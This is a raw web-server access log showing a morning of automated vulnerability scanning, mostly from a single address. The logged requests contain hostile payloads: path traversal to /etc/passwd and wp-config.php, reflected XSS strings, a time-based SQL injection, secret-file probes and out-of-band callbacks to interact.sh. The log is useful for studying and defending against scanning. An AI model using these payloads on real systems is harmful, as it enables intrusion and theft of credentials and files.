72.44.65.82 - - [09/Mar/2023:07:56:18 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:56:20 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:56:28 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:56:28 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:56:29 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:56:32 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:56:50 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:57:04 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:08:02:46 +0530] "GET /xmldata?item=CpqKey HTTP/1.1" 404 1008
72.44.65.82 - - [09/Mar/2023:08:03:45 +0530] "POST /oauth/token HTTP/1.1" 404 1016
72.44.65.82 - - [09/Mar/2023:08:05:37 +0530] "GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:08:07:22 +0530] "GET /wp-admin/admin-ajax.php?_memberhero_hook=phpinfo&action=memberhero_send_form HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:08:10:06 +0530] "GET /api/console/api_server?apis=../../../../../../../../../../../etc/passwd&sense_version=%40%40SENSE_VERSION HTTP/1.1" 404 1038
72.44.65.82 - - [09/Mar/2023:08:14:27 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
193.142.146.101 - - [09/Mar/2023:08:15:51 +0530] "GET / HTTP/1.1" 200 11250
193.142.146.101 - - [09/Mar/2023:08:16:25 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:08:18:29 +0530] "POST /user/register?_wrapper_format=drupal_ajax&ajax_form=1&element_parents=account/mail/%23value HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:08:19:47 +0530] "GET /service/0/test.oast.me HTTP/1.1" 404 1038
90.151.171.106 - - [09/Mar/2023:08:25:46 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:08:25:46 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:08:25:46 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:08:25:46 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:08:25:46 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:08:25:51 +0530] "GET /ip?Z70629657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [09/Mar/2023:08:25:51 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:08:25:51 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:08:27:59 +0530] "GET /logo/2Mgie83oUOySEY7cjnCQ5855OpL.txt HTTP/1.1" 404 1066
72.44.65.82 - - [09/Mar/2023:08:28:01 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:08:28:58 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:08:29:52 +0530] "POST /index.php HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:08:29:54 +0530] "POST /TransferredOutModal.php?modfunc=detail HTTP/1.1" 404 1040
107.189.2.248 - - [09/Mar/2023:08:31:30 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:08:32:18 +0530] "POST /_bulk HTTP/1.1" 404 1004
72.44.65.82 - - [09/Mar/2023:08:34:49 +0530] "GET /dashboard.aspx HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:08:41:34 +0530] "GET /wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1 HTTP/1.1" 404 1114
72.44.65.82 - - [09/Mar/2023:08:42:31 +0530] "GET /secret_token.rb HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:08:42:32 +0530] "GET /config/initializers/secret_token.rb HTTP/1.1" 404 1064
72.44.65.82 - - [09/Mar/2023:08:44:46 +0530] "GET /assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1076
72.44.65.82 - - [09/Mar/2023:08:46:03 +0530] "GET /admin/histograms?fmt=plot_cdf&h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&log_scale=true HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:08:48:31 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:08:56:35 +0530] "GET /kvmlm2/index.dhtml?fname&language=../../../../../../../../../../etc/passwd%00.jpg&lname&sponsor=gdi&template=11 HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:08:58:44 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:09:01:39 +0530] "POST /signin HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:09:01:43 +0530] "GET /user HTTP/1.1" 404 1002
72.44.65.82 - - [09/Mar/2023:09:01:53 +0530] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&name=2Mgie1Yu6F7FIPJ0OOvWTaX2qjH.php:aaa&target=l1_Lw HTTP/1.1" 404 1062
72.44.65.82 - - [09/Mar/2023:09:03:58 +0530] "GET /docker-cloud.yml HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:09:09:14 +0530] "GET /data/pbootcms.db HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:09:10:51 +0530] "GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 1070
72.44.65.82 - - [09/Mar/2023:09:12:20 +0530] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 1186
90.151.171.106 - - [09/Mar/2023:09:12:27 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:09:12:27 +0530] "CONNECT api.ipify.org:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:09:12:27 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:09:12:27 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:09:12:33 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:09:12:33 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:09:12:33 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:09:12:33 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:09:14:00 +0530] "GET /_async/favicon.ico HTTP/1.1" 404 1030
64.62.197.41 - - [09/Mar/2023:09:18:08 +0530] "GET / HTTP/1.1" 200 11250
64.62.197.36 - - [09/Mar/2023:09:18:34 +0530] "GET /?format=json HTTP/1.1" 200 11250
64.62.197.39 - - [09/Mar/2023:09:18:46 +0530] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:09:20:06 +0530] "GET /phpmyadmin/setup/index.php?id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mode=test&page=servers HTTP/1.1" 404 1046
72.44.65.82 - - [09/Mar/2023:09:20:07 +0530] "GET /setup/index.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mode=test&page=servers HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:09:20:48 +0530] "GET /jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:09:25:23 +0530] "GET /cgi-bin/cosmobdf.cgi?function=1 HTTP/1.1" 404 1034
72.44.65.82 - - [09/Mar/2023:09:28:27 +0530] "GET /api/sso/v2/sso/jwt?error_url=http://interact.sh HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:09:29:04 +0530] "GET /NCFindWeb?filename&service=IPreAlertConfigService HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:09:29:35 +0530] "GET /components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1090
72.44.65.82 - - [09/Mar/2023:09:37:09 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:09:37:10 +0530] "GET /sqlite/ HTTP/1.1" 404 1008
72.44.65.82 - - [09/Mar/2023:09:37:10 +0530] "GET /sqlitemanager/ HTTP/1.1" 404 1022
183.136.225.9 - - [09/Mar/2023:09:37:43 +0530] "GET / HTTP/1.1" 200 11250
183.136.225.9 - - [09/Mar/2023:09:37:45 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
183.136.225.9 - - [09/Mar/2023:09:37:46 +0530] "GET /robots.txt HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:09:42:02 +0530] "GET /ioncube/loader-wizard.php HTTP/1.1" 404 1044
199.195.248.153 - - [09/Mar/2023:09:42:39 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:09:47:24 +0530] "GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 404 1016
72.44.65.82 - - [09/Mar/2023:09:48:36 +0530] "GET /verify.php?confirm_hash&id=1 HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:09:48:47 +0530] "GET /mantisBT/verify.php?confirm_hash&id=1 HTTP/1.1" 404 1032
72.44.65.82 - - [09/Mar/2023:09:49:00 +0530] "GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:09:50:10 +0530] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 1030
90.151.171.108 - - [09/Mar/2023:09:52:25 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:09:52:25 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:09:52:30 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:09:52:30 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:09:52:35 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:09:52:35 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:09:52:40 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:09:52:40 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:09:54:16 +0530] "GET /api/proxy/tcp HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:09:56:55 +0530] "GET /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 HTTP/1.1" 404 1565
72.44.65.82 - - [09/Mar/2023:09:58:53 +0530] "GET /wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 404 1102
72.44.65.82 - - [09/Mar/2023:09:59:47 +0530] "GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1" 404 1082
72.44.65.82 - - [09/Mar/2023:10:03:21 +0530] "GET /index.php/Pan/ShareUrl/downloadSharedFile?file_name=win.ini&true_path=../../../../../../windows/win.ini HTTP/1.1" 404 1076
72.44.65.82 - - [09/Mar/2023:10:03:29 +0530] "GET /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd HTTP/1.1" 404 1096
72.44.65.82 - - [09/Mar/2023:10:03:49 +0530] "GET /OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain) HTTP/1.1" 404 1032
72.44.65.82 - - [09/Mar/2023:10:04:18 +0530] "POST /lucee/admin/imgProcess.cfm?file=/../../../context/2Mgie2IsofbDOMvOQ4lhs0MBgi4.cfm HTTP/1.1" 404 1046
72.44.65.82 - - [09/Mar/2023:10:06:08 +0530] "POST /index.php?do=orgtree&mod=system&op=orgtree HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:10:12:37 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:10:13:47 +0530] "GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 200 11250
64.62.197.60 - - [09/Mar/2023:10:16:27 +0530] "GET / HTTP/1.1" 200 11250
64.62.197.48 - - [09/Mar/2023:10:17:08 +0530] "GET /?format=json HTTP/1.1" 200 11250
64.62.197.61 - - [09/Mar/2023:10:17:20 +0530] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:10:20:36 +0530] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 1056
72.44.65.82 - - [09/Mar/2023:10:20:40 +0530] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:10:20:55 +0530] "GET /kylin/api/admin/config HTTP/1.1" 404 1038
72.44.65.82 - - [09/Mar/2023:10:22:15 +0530] "GET /?post_type=post&s=%22%3E%3Cscript%3Ealert(/2MgieIXvfgaBD7MpDakg06i4Mo4/)%3C/script%3E+ HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:10:23:02 +0530] "GET /ajax.php?entriesPerPage=15&f=getPipelineJobOrder&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0&joborderID=50&page=0&sortBy=dateCreatedInt&sortDirection=desc HTTP/1.1" 404 1010
72.44.65.82 - - [09/Mar/2023:10:26:02 +0530] "GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb HTTP/1.1" 404 1210
72.44.65.82 - - [09/Mar/2023:10:26:46 +0530] "POST /module/ HTTP/1.1" 404 1008
72.44.65.82 - - [09/Mar/2023:10:26:57 +0530] "POST /module/ HTTP/1.1" 404 1008
90.151.171.106 - - [09/Mar/2023:10:28:12 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:10:28:12 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:10:28:12 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:10:28:12 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:10:28:12 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:10:28:12 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:10:28:17 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:10:28:17 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:10:31:17 +0530] "GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:10:35:01 +0530] "GET /assets/php/filebrowser/filebrowser.main.php?do=download&file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1080
72.44.65.82 - - [09/Mar/2023:10:42:06 +0530] "GET /v1/submissions HTTP/1.1" 404 1022
193.142.146.101 - - [09/Mar/2023:10:45:22 +0530] "GET / HTTP/1.1" 200 11250
193.142.146.101 - - [09/Mar/2023:10:45:36 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:10:46:58 +0530] "GET /secure/ConfigurePortalPages!default.jspa?Search=Search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&view=search HTTP/1.1" 404 1074
64.62.197.34 - - [09/Mar/2023:10:48:30 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:10:48:59 +0530] "GET /pme/database/pme/phinx.yml HTTP/1.1" 404 1046
72.44.65.82 - - [09/Mar/2023:10:52:44 +0530] "GET /wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1114
111.7.96.147 - - [09/Mar/2023:10:58:12 +0530] "GET / HTTP/1.1" 200 11250
209.141.33.65 - - [09/Mar/2023:10:58:17 +0530] "GET / HTTP/1.1" 200 11250
209.141.33.65 - - [09/Mar/2023:10:58:18 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
72.44.65.82 - - [09/Mar/2023:10:59:22 +0530] "GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1" 404 1164
72.44.65.82 - - [09/Mar/2023:11:03:13 +0530] "GET /ACSServer/DownloadFileServlet?path=anything&show_file_name=../../../../../../etc/passwd&type=uploadfile HTTP/1.1" 404 1052
72.44.65.82 - - [09/Mar/2023:11:04:13 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:11:04:48 +0530] "GET /status.htm HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:11:07:01 +0530] "GET /api/geojson?url=file:///etc/passwd HTTP/1.1" 404 1016
72.44.65.82 - - [09/Mar/2023:11:08:07 +0530] "GET /api/v4/users/3 HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:11:08:15 +0530] "GET /api/v4/users/4 HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:11:08:16 +0530] "GET /api/v4/users/5 HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:11:08:30 +0530] "GET /api/v4/users/7 HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:11:08:34 +0530] "GET /api/v4/users/8 HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:11:09:20 +0530] "GET /api/v4/users/13 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:09:24 +0530] "GET /api/v4/users/14 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:09:46 +0530] "GET /api/v4/users/17 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:09:56 +0530] "GET /api/v4/users/19 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:09:57 +0530] "GET /api/v4/users/20 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:10:01 +0530] "GET /api/v4/users/21 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:10:08 +0530] "GET /api/v4/users/22 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:10:42 +0530] "GET /api/v4/users/26 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:10:49 +0530] "POST /api/v1/method.callAnon/cve_exploit HTTP/1.1" 404 1062
72.44.65.82 - - [09/Mar/2023:11:10:50 +0530] "POST /api/v1/method.callAnon/cve_exploit HTTP/1.1" 404 1062
72.44.65.82 - - [09/Mar/2023:11:11:00 +0530] "GET /api/v4/users/28 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:11:01 +0530] "GET /api/v4/users/29 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:11:05 +0530] "GET /api/v4/users/30 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:11:47 +0530] "GET /api/v4/users/35 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:11:57 +0530] "GET /api/v4/users/37 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:12:05 +0530] "GET /api/v4/users/38 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:12:17 +0530] "GET /api/v4/users/40 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:12:20 +0530] "GET /api/v4/users/41 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:12:21 +0530] "GET /api/v4/users/42 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:12:21 +0530] "GET /api/v4/users/43 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:12:52 +0530] "GET /api/v4/users/47 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:13:23 +0530] "GET /api/v4/users/51 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:14:03 +0530] "GET /api/v4/users/56 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:14:17 +0530] "GET /api/v4/users/58 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:14:25 +0530] "GET /api/v4/users/59 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:14:36 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:11:14:43 +0530] "GET /api/v4/users/61 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:15:34 +0530] "GET /api/v4/users/67 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:15:46 +0530] "GET /api/v4/users/69 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:15:57 +0530] "GET /api/v4/users/71 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:16:19 +0530] "GET /api/v4/users/74 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:16:28 +0530] "POST /AurallRECMonitor/services/svc-login.php HTTP/1.1" 404 1072
72.44.65.82 - - [09/Mar/2023:11:16:37 +0530] "GET /api/v4/users/76 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:16:55 +0530] "GET /api/v4/users/78 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:16:55 +0530] "GET /api/v4/users/79 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:17:09 +0530] "GET /api/v4/users/81 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:17:09 +0530] "GET /api/v4/users/82 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:17:10 +0530] "GET /api/v4/users/83 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:17:10 +0530] "GET /api/v4/users/84 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:17:42 +0530] "GET /api/v4/users/88 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:17:43 +0530] "GET /api/v4/users/89 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:17:43 +0530] "GET /api/v4/users/90 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:17:57 +0530] "GET /.netrc HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:11:18:04 +0530] "GET /api/v4/users/93 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:18:05 +0530] "GET /api/v4/users/94 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:18:28 +0530] "GET /api/v4/users/97 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:18:29 +0530] "GET /api/v4/users/98 HTTP/1.1" 404 1024
72.44.65.82 - - [09/Mar/2023:11:18:29 +0530] "GET /api/v4/users/99 HTTP/1.1" 404 1024
90.151.171.106 - - [09/Mar/2023:11:22:09 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:11:22:09 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:11:22:09 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:11:22:09 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:11:22:09 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:11:22:14 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:11:22:14 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:11:22:14 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:11:22:28 +0530] "GET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:11:22:28 +0530] "GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1" 404 1098
72.44.65.82 - - [09/Mar/2023:11:23:59 +0530] "GET /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_mscomment HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:11:32:07 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:11:35:47 +0530] "GET /Solar_SlideSub.php?bgcolor=green&id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22 HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:11:37:31 +0530] "POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1" 404 1054
34.204.185.253 - - [09/Mar/2023:11:38:16 +0530] "GET /99vt HTTP/1.1" 404 1002
34.204.185.253 - - [09/Mar/2023:11:38:16 +0530] "-" 400 -
34.204.185.253 - - [09/Mar/2023:11:38:16 +0530] "GET /aaaaaaaaaaaaaaaaaaaaaaaaaqr HTTP/1.1" 404 1048
34.204.185.253 - - [09/Mar/2023:11:38:16 +0530] "-" 400 -
34.204.185.253 - - [09/Mar/2023:11:38:16 +0530] "-" 400 -
34.204.185.253 - - [09/Mar/2023:11:38:16 +0530] "GET /99vu HTTP/1.1" 404 1002
72.44.65.82 - - [09/Mar/2023:11:38:19 +0530] "POST /share/page/dologin HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:11:45:38 +0530] "GET /etc/acs-commons/oak-index-manager.html HTTP/1.1" 404 1070
72.44.65.82 - - [09/Mar/2023:11:47:07 +0530] "POST /invoker/JMXInvokerServlet/ HTTP/1.1" 404 1046
72.44.65.82 - - [09/Mar/2023:11:47:08 +0530] "POST /invoker/EJBInvokerServlet/ HTTP/1.1" 404 1046
72.44.65.82 - - [09/Mar/2023:11:47:08 +0530] "POST /invoker/readonly HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:11:49:25 +0530] "GET /test/pathtraversal/master/../../../../../etc/passwd HTTP/1.1" 400 -
167.94.138.36 - - [09/Mar/2023:11:51:49 +0530] "GET / HTTP/1.1" 200 11250
167.94.138.36 - - [09/Mar/2023:11:51:50 +0530] "GET / HTTP/1.1" 200 11250
167.94.138.36 - - [09/Mar/2023:11:51:51 +0530] "PRI * HTTP/2.0" 505 -
167.94.138.36 - - [09/Mar/2023:11:51:51 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
43.153.208.98 - - [09/Mar/2023:11:52:37 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:11:56:08 +0530] "GET /index.php?content=../../../../../../../../etc/passwd HTTP/1.1" 404 1012
43.153.208.98 - - [09/Mar/2023:11:57:11 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:11:57:43 +0530] "GET /bonita/portal/themeResource?location=etc/passwd&theme=portal/../../../../../../../../../../../../../../../../ HTTP/1.1" 404 1048
72.44.65.82 - - [09/Mar/2023:12:02:12 +0530] "GET /NON_EXISTING_PATH/ HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:12:04:17 +0530] "GET /wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1 HTTP/1.1" 404 1040
72.44.65.82 - - [09/Mar/2023:12:08:06 +0530] "POST /classes/Login.php?f=login HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:12:08:57 +0530] "GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1" 404 1038
90.151.171.108 - - [09/Mar/2023:12:11:25 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:12:11:25 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:12:11:25 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:12:11:25 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:12:11:25 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:12:11:25 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:12:11:30 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:12:11:30 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:12:11:52 +0530] "POST /actions/authenticate.php HTTP/1.1" 404 1042
